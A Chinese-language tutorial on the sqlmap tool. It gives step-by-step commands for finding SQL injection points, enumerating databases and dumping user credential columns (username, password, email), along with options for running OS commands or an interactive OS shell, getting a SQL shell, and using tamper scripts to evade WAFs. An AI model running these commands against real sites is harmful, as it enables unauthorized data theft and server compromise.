注意事项：

sqlmap运行需要搭建python环境。也有无环境的安装包

sqlmap只是用来检测和利用sql注入点的，并不能扫描出网站有哪些漏洞，使用前请先使用扫描工具扫出sql注入点。

sqlmap命令区分大小写

一、使用sqlmap

sqlmap的命令一般都是通用的，只有极少数命令是针对个别数据库的。

第一步：判断啊是否是注入点

 sqlmap.py -u "url"

使用 -u参数指定url，如果url存在注入点，将会显示出web容器、数据库版本信息

第二步：获取所有数据库名

sqlmap.py -u "url" --dbs

使用-dbs读取数据库

第三步:查看当前应用程序所用数据库

sqlmap.py -u "url"  --current-db

使用 --current-db参数列出当前应用程序所使用的数据库

第四步:列出制定数据库的所有表

sqlmap.py -u "url" --table -D "bbs"

使用--table参数获取数据库表，-D参数指定数据库

第五步:读取指定表中的字段名称

sqlmap.py -u "url"  --columns -T "User" -D "bbs"

使用--columns参数列取字段名

第六步：获取指定字段内容

sqlmap.py -u "url" --dump -C "UserName,passWord,Email" -T "[User]" -D "bbs"

--dump 转存数据

-C参数指定字段名称

-T指定表名【因为user属于数据库关键字，所以建议加上【】】

-D指定数据库名称

 读取完数据以后，sqlmap会把读取的数据转存到sqlmap/output目录下，文件以“Table.cvs”

保存

通过以上六个步骤，sqlmap可以轻松地对存在注入漏洞的 URL读取数据

二、sqlmap参数 例举了一些常用参数

（1）测试注入点权限

sqlmap.py -u [URL]     -- privileges  //测试所有用户的权限

sqlmap.py -u [URL]    -- privileges -U sa //测试sa用户权限

（2）执行shell命令

sqlmap.py -u  [URL]   --os-cmd="net user"   //执行net user命令

sqlmap.py -u  [URL]    --os-shell    //系统交互的shell

(3)获取当前数据库名称

sqlmap.py -u  [URL]     --current-db

(4)执行sql命令

sqlmap.py -u [URL]    --sql-shell  //返回sql交互的shell，可以执行sql语句

sqlmap.py -u [URL]     --sql-query="sql"

(5)POST提交方式

sqlmap.py -u [URL]     --data "POST参数"

(6)显示详细的等级

sqlmap.py -u [URL]    --dbs -v 1

-v参数有以下7个等级

0、只显示python错误以及严重的信息。

1、同时显示基本信息和警告信息。（默认）

2、同时显示debug信息。

3、同时显示注入的payload。

4、同时显示HTTP请求。

5、同时显示HTTP响应头。

6、同时显示HTTP响应页面。

如果你想看到sqlmap发送的测试payload最好的等级就是3。

(7)注入HTTP请求

sqlmap.py -r head.txt --dbs    //head.txt 内容为HTTP请求

(8)注入等级

sqlmap.py -u [URL] --level 3

(9)将注入语句插到指定位置

sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs

有些网站采用了伪静态页面，这时再使用sqlmap注入是无能为力的，因为sqlmap无法识别哪里是对服务器提交的请求参数，所以sqlmap提供了“*”参数，将sql语句插入到指定位置，这一用法常用于伪静态注入。

（10）使用sqlmap插件

sqlmap.py -u [URL]  -tamper "space2morehash.py"

sqlmap自带了很多插件，可针对注入的sql语句进行编码等操作，插件都保存在sqlmap目录下的tamper文件夹中，这些插件通常用来绕过waf

更详细的参数参照 sqlmap.py   -hh